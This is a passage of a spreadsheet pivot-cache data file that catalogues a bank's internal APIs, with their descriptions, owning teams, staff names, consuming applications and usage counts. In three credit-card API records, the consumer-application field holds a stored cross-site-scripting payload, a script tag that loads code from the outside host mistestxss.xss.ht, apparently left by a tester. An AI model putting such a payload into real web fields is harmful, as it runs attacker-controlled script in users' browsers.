    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="3663"/>
    <n v="8815"/>
    <n v="7134"/>
    <n v="6422"/>
    <n v="2469"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-04-28T11:02:34"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Cards Limit"/>
    <n v="100"/>
    <s v="credit-cards-cards-limit"/>
    <s v="Capacidad que permite aumentar o disminuir el cupo (lí­mite) de una tarjeta de crédito mediante el níºmero de tarjeta, el cupo actual y el cupo nuevo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ModificacionDeCupoTarjetas/V1.0"/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-06-02T14:33:04"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Management"/>
    <n v="100"/>
    <s v="credit-cards-management"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar la emisión de tarjetas de crédito. Inicialmente, la API tendrá las siguientes capacidades: *  Crear tarjeta de crédito por uso inmediato"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="GestionTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-06-02T14:33:04"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Product Information"/>
    <n v="100"/>
    <s v="credit-cards-product-information"/>
    <s v="Permite realizar diferentes tipos de consultas asociadas al producto Tarjetas de Crédito, viéndolo como una entidad y no como las consultas asociadas a las tarjetas de un cliente. Actualmente tiene disponible la consulta de las tasas de interés efectivo anual y mensual para el producto, permitiendo discriminar por tipo de transacción (compra, avance, impuesto, mora, re-financiación, compra de cartera), franquicia o producto (logo)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <n v="7141"/>
    <n v="7231"/>
    <n v="8824"/>
    <n v="8983"/>
    <n v="9468"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-22T10:15:21"/>
    <s v="Credit Disbursement"/>
    <n v="101"/>
    <s v="Credit Disbursement - Management"/>
    <n v="101"/>
    <s v="credit-disbursement-management"/>
    <s v="La API credit disbursement - management permitire que desde el proyecto Pyme se pueda saber la notificacion de desembolso de un credito desde Bizagui."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Pymes y Empresas"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-02T14:39:40"/>
    <s v="Credit Limit"/>
    <n v="101"/>
    <s v="Credit Limit - Credit Limits Management"/>
    <n v="101"/>
    <s v="credit-limit-credit-limits-management"/>
    <s v="Esta API cuenta con capacidades que permite la creación de lí­mites de endeudamiento"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="25"/>
    <n v="7"/>
    <n v="1"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Estimate Transactions"/>
    <n v="120"/>
    <s v="currency-exchange-estimate-transactions"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Financiasion"/>
    <m/>
    <s v="CalcularOperacionDivisas/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15067"/>
    <n v="13821"/>
    <n v="12778"/>
    <n v="12994"/>
    <n v="13343"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Exchange Numerals"/>
    <n v="100"/>
    <s v="currency-exchange-exchange-numerals"/>
    <s v="El API Currency Exchange - Exchange Numerales permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="consultaNumeralCambiario/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15064"/>
    <n v="13821"/>
    <n v="12772"/>
    <n v="12993"/>
    <n v="13357"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Negociated Rates"/>
    <n v="100"/>
    <s v="currency-exchange-negociated-rates"/>
    <s v="El API Currency Exchange Negociated Rates permitirá la consulta de las tasas negociadas que están disponibles para realizar transacciones de compra y venta de divisas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="GestionTasaPactada/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15066"/>
    <n v="13811"/>
    <n v="12793"/>
    <n v="12984"/>
    <n v="13372"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-25T17:50:55"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Orders"/>
    <n v="100"/>
    <s v="currency-exchange-orders"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="GestionOrdenes/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15062"/>
    <n v="13823"/>
    <n v="12776"/>
    <n v="12982"/>
    <n v="13376"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-27T10:02:05"/>
    <s v="Currency Exchange"/>
    <n v="113"/>
    <s v="Currency Exchange - Rates"/>
    <n v="103"/>
    <s v="currency-exchange-rates"/>
    <s v="La Api de Currency Exchange - rates tiene como objetivo consultar el valor de la tasa de cambio entre dos tipos de moneda."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaTasa/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <n v="291"/>
    <n v="237"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Transactions"/>
    <n v="120"/>
    <s v="currency-exchange-transactions"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15066"/>
    <n v="13821"/>
    <n v="12769"/>
    <n v="12984"/>
    <n v="13338"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-23T17:04:12"/>
    <s v="Currency Exchange"/>
    <n v="113"/>
    <s v="Currency Exchange - Transfer Rates"/>
    <n v="112"/>
    <s v="currency-exchange-transfer-rates"/>
    <s v="La Api de Currency Exchange  Transfer Rates tiene como objetivo exponer la información de las comisiones y tasas preferenciales del cliente cuando se realiza una transferencia internacional."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionComisionTransferenciasExternas/V1.0, _x000a_ConsultaTasaPreferencialCliente/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-12T08:47:49"/>
    <s v="Currency Exchange Reasons"/>
    <n v="100"/>
    <s v="Currency Exchange Reasons - Transaction Reasons"/>
    <n v="100"/>
    <s v="currency-exchange-transaction-reasons"/>
    <s v="La API Permite consultar los posibles motivos de la transacción para operaciones de enví­o y recepción de divisas. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <n v="6"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-03-10T14:01:35"/>
    <s v="Customer Validation"/>
    <n v="203"/>
    <s v="Customer - Check Control List"/>
    <n v="203"/>
    <s v="customer-check-control-list"/>
    <s v="API que permite listar los detalles de un cliente en Listas de Control."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="ConsultaListasDeControl/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ VinculacionAperturaProductoDigital_AW1128 _x000d__x000a_ VinculacionAperturaProductoDigitalSucursales_AW1177 _x000d__x000a_ BIZTRACK_AW0998 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ PLINK_AW1206001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ ECORIESGOS_AW1081001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ Plink_AW1206001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ PLINK_AW1206001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ OYD_AW0629001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="639145"/>
    <n v="506982"/>
    <n v="486266"/>
    <n v="561137"/>
    <n v="689546"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-05T11:41:29"/>
    <s v="Customer - Manage Prospect"/>
    <n v="101"/>
    <s v="Customer - Manage Prospect Natural Person"/>
    <n v="101"/>
    <s v="customer-manage-prospect-natural-person"/>
    <s v="La Api ofrece a los consumidores, la capacidad de crear y modificar clientes como personas naturales en SAP CRM."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionarProspecto/V2.0"/>
    <s v="SAP CRM_AW0682001"/>
    <s v="NEQUICLIENTES_AW1011 _x000d__x000a_ BCHerramientasMonitoreoPrd2"/>
    <n v="26258"/>
    <n v="18066"/>
    <n v="117011"/>
    <n v="183486"/>
    <n v="177912"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-06T14:49:44"/>
    <s v="Customer Manage Prospect"/>
    <n v="101"/>
    <s v="Customer - Manage Prospect Natural Person"/>
    <n v="101"/>
    <s v="customer-manage-prospect-natural-person"/>
    <s v="La Api ofrece a los consumidores, la capacidad de crear y modificar clientes como personas naturales en SAP CRM."/>
    <s v="CLIENTES"/>
    <s v="Transversales Clientes"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <s v="GestionarProspecto/V2.0"/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T15:37:14"/>
    <s v="CustomerProducts"/>
    <n v="110"/>
    <s v="Customer - Products"/>
    <n v="110"/>
    <s v="customer-products"/>
    <s v="Permitir consultar la información de productos asociados a un cliente"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarProducto/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ Cayman_Soporte _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="56452"/>
    <n v="55858"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T10:55:21"/>
    <s v="Customer Accounts"/>
    <n v="113"/>
    <s v="Customer Accounts - Accounts"/>
    <n v="113"/>
    <s v="customer-accounts-accounts"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ Valores_AW1373 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Boton de Transferencias_AW1277001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ PODEM01_NU0001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Cuentas_Bancolombia_AW1081001_SUFI_APM _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ prueba _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ APP_PRUEBA _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ ModuloSVELeasing_AW0360006 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ ms_bs_customer_account_NU0163001"/>
    <n v="93076"/>
    <n v="154858"/>
    <n v="42180102"/>
    <n v="41278649"/>
    <n v="50537375"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T10:55:21"/>
    <s v="Customer Accounts"/>
    <n v="113"/>
    <s v="Customer Accounts - Balances"/>
    <n v="113"/>
    <s v="customer-accounts-balances"/>
    <s v="Permite realizar las consultas de saldos de una cuenta de depósito, se puede consultar por cuenta o por todas las cuentas de un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ Valores_AW1373 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Boton de Transferencias_AW1277001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ PODEM01_NU0001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Cuentas_Bancolombia_AW1081001_SUFI_APM _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ prueba _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ APP_PRUEBA _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ ModuloSVELeasing_AW0360006 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ ms_bs_customer_account_NU0163001"/>
    <n v="2692855"/>
    <n v="2555186"/>
    <n v="2555180"/>
    <n v="2680531"/>
    <n v="3143115"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition  Notification"/>
    <n v="110"/>
    <s v="customer-acquisition-notification"/>
    <s v="## **Descripción:** La API Customer Acquisition Notification agrupa todas las capacidades de notificación requeridas en los procesos de Conocimiento del Cliente. Una notificación corresponde a cualquier información asociada al proceso y que el negocio desea que el potencial cliente conozca, por ejemplo: un correo de bienvenida,  un formato o documento, etc.  Las notificaciones pueden ser enviadas ví­a correo electrónico o sms dependiendo de su naturaleza, a medida que se vayan habilitando en la API.  ## **Operaciones**  ###### **Enviar Formato:** Esta operación habilita el enví­o de notificación ví­a correo electrónico al potencial cliente, indicando la finalización exitosa de la vinculación del cliente y adjuntando el Formato de Conocimiento del Cliente. Recibe un set de parámetros que permiten identificar el escenario de vinculación para el cual se desea enviar la notificación y el tipo de notificación que aplica. Premisas de Enviar Formato:  - Se valida la existencia de un correo electrónico registrado en el sistema.  - La operación habilita la captura de un correo electrónico como dato opcional, pero tiene prioridad el registrado previamente en el sistema para la validación del cliente.  - Para el consumo exitoso de esta operación es necesario que se hayan completado las operaciones prerrequisito definidas para el escenario de vinculación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T15:15:02"/>
    <s v="Customer Acquisition Data"/>
    <n v="100"/>
    <s v="Customer Acquisition - Persistence"/>
    <n v="100"/>
    <s v="customer-acquisition-persistence"/>
    <s v="## **Descripción:** La API Customer Acquisition Persistence habilita las capacidades para registrar la  vinculación finalizada en los maestros de clientes, garantizando la completitud de todas las actividades exigidas por los procesos de conocimiento del cliente. Además, incluye funcionalidades para custodiar los documentos soporte de los procesos de conocimiento del cliente cumpliendo así­ las exigencias normativas. ## **Operaciones**  ###### **Persistir Datos Cliente** Permite dejar en firme la vinculación en los maestro de clientes, modificando el estado de la vinculación en SAP CRM a finalizada, haciendo uso del servicio Gestionar Prospectos. Para habilitar esta capacidad es necesario ejecutar previamente la segmentación y calificalificación del potencial cliente y  además garantizar la firma electrónica del formato F-2486 Conocimiento PN_VinculacioÌ?n Transversal generado en el proceso con la información capturada a través de la API Information NP. ###### **Persistir documentos del Cliente** A través de esta capacidad se realiza la custodia en Oracle de los documentos soporte cargados por el potencial cliente requeridos en la experiencia; esta custodia se efectíºa  haciendo uso del servicio de TDC. Premisas de Persistir Documentos del Cliente: - Para los escenarios del proceso de vinculación esta es la ultima operación a consumir para garantizar la finalización de la solicitud y dar cumplimiento a la norma. - En algunos casos la operación entrega una respuesta de rechazo pero indica que se puede continuar con las gestiones del producto, enviando los documentos a custodiar a través de un proceso de reintentos por lotes. - Este proceso de custodia aplica para documentos que no requieren firma."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T09:31:07"/>
    <s v="CustomerAcquisitionDocs"/>
    <n v="101"/>
    <s v="Customer Acquisition Documents Digitalization"/>
    <n v="101"/>
    <s v="customer-acquisition-documents-digitalization"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para el cargue y procesamiento de documentos soporte de los proceso de conocimiento del cliente. Lo anterior con el objetivo de extraer su data lí­quida (cuando aplique) o simplemente almacenar aquellos documentos digitalizados que se convierten en soportes del potencial cliente, por ejemplo, documento de identidad, carta laboral, etc. Estos documentos se persistirán en el repositorio oficial del Banco a través de la API Customer Acquisition Persistence, solo si el proceso se finaliza satisfactoriamente, de lo contrario serán desechados. Esta API contempla capacidades que permiten el procesamiento de los documentos de forma sí­ncrona o así­ncrona de acuerdo a los escenarios de conocimiento del cliente a habilitar. Posteriormente, en esta API se incorporará  el cargue y/o procesamiento de documentos adicionales para la vinculación y/o actualización de personas naturales y jurí­dicas. Premisas de la API Customer Acquisition Digitalization: * Solo está habilitado el cargue y procesamiento de documentos en formato .pdf, .jpg, .jpeg, .tif, .tiff o .png. * Se debe garantizar que el tamaí±o de los archivos a cargar no superen el lí­mite máximo permitido, el cual está inicialmente parametrizado en 4 MB. Posteriormente éste se pretende ampliar a 10 MB. * Cuando se requiera procesar documentos de forma así­ncrona, se debe efectuar el cargue a través de la operación cargar documentos, indicando que no se esperará el resultado del procesamiento, éste se debe consultar a través de la operación validar datos extraí­dos. ## **Operaciones**  ###### **Cargar documentos:** A través de esta operación es posible cargar el documento de identidad  y los documentos soporte del proceso de vinculación de los potenciales clientes, inicialmente solo se tendrá habilitado el cargue de cédula de ciudadaní­a y el registro íºnico tributario (RUT) como documento soporte adicional. Lo anterior es posible a través de la herramienta Kofax consumiendo la API Document Management - Digitalization_v1.0.0 Premisas de Cargar documentos: * Permite extraer, a través del procesamiento del documento de identidad, los datos requeridos para ejecutar la etapa 1 de la validación de identidad (comparación de datos de identidad - Reconocer) * Tiene parametrizado un níºmero máximo de reintentos para cada subtipo documental, una vez se superan se cancela la solicitud. * Esta capacidad habilita el diligenciamiento manual de algunos campos presentes en la cédula de ciudadaní­a cuando Kofax realiza un procesamiento parcial del documento. * Los datos extraí­dos se almacenan como parte de los datos personales del cliente y no se permite su edición posteriormente. * Permite extraer información del RUT para verificar la actividad económica de algunas ocupaciones parametrizadas en el componente. * Habilita para el consumidor la posibilidad de indicar a través de variables de entrada si el subtipo documental requiere solo carga o carga mas procesamiento,  asimismo permite indicar si el procesamiento es sí­ncrono o así­ncrono. ###### **Validar datos extraidos:** A través de esta operación es posible consultar el resultado del procesamiento de los documentos cargados en la operación cargar documentos, siempre y cuando se haya indicando en el cargue la ejecución de proceso de manera así­ncrona.  Premisas de Validar Datos Extraí­dos: * La respuesta de esta operación es la misma que se entrega al consumidor en Cargar Documentos, se diferencias en tiempo de procesamiento. * En los escenarios de vinculación parametrizados inicialmente en el componente, no se contempla el uso de esta operación, dado que el procesamiento del documento de identidad y del RUT es prerrequisito de las actividades predecesoras de esta validación. Se debe asegurar revisión funcional previo a parametrizarla en un escenario de vinculación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T14:51:25"/>
    <s v="Customer Acquisition Security"/>
    <n v="100"/>
    <s v="Customer Acquisition Identity"/>
    <n v="100"/>
    <s v="customer-acquisition-identity"/>
    <s v="## **Descripción:** La API Customer Acquisition Identity habilita las capacidades para validar la identidad del potencial cliente, asegurando que quien adelanta el proceso es quien dice ser, lo anterior es posible a través de los siguientes mecanismos:  - Comparación de datos de identidad contra fuentes externas  - Generación y validación de preguntas reto A través del primer mecanismo, se comparan los datos suministrados por el potencial cliente en el Producto Customer Acquisition Data y los datos extraí­dos a partir del documento de identidad versus los datos del potencial cliente entregados por fuentes externas avaladas por el Banco. El segundo mecanismo, habilita un cuestionario de preguntas reto, soportadas en Información almacenada en las centrales de riesgo sobre el potencial cliente a validar. Inicialmente este mecanismo se soporta en el Servicio Evidente (API Customer Risk - Validate Identity). ## **Operaciones**  ###### **Validar Identidad Cliente** A través de esta operación es posible validar la identidad del potencial cliente o representante legal, comparando los datos del documento de identidad contra las fuentes de información externas avaladas por el Banco. Inicialmente se hará uso de Experian como fuente externa, a través del Servicio Reconocer, el cual corresponde a la primera etapa de la Operación Validar identidad del cliente. Este servicio consume la API Customer Profile Information - Private External Sources. Esta operación evalíºa la vigencia del documento de identidad reportado por la fuente externa y determina el puntaje obtenido en la 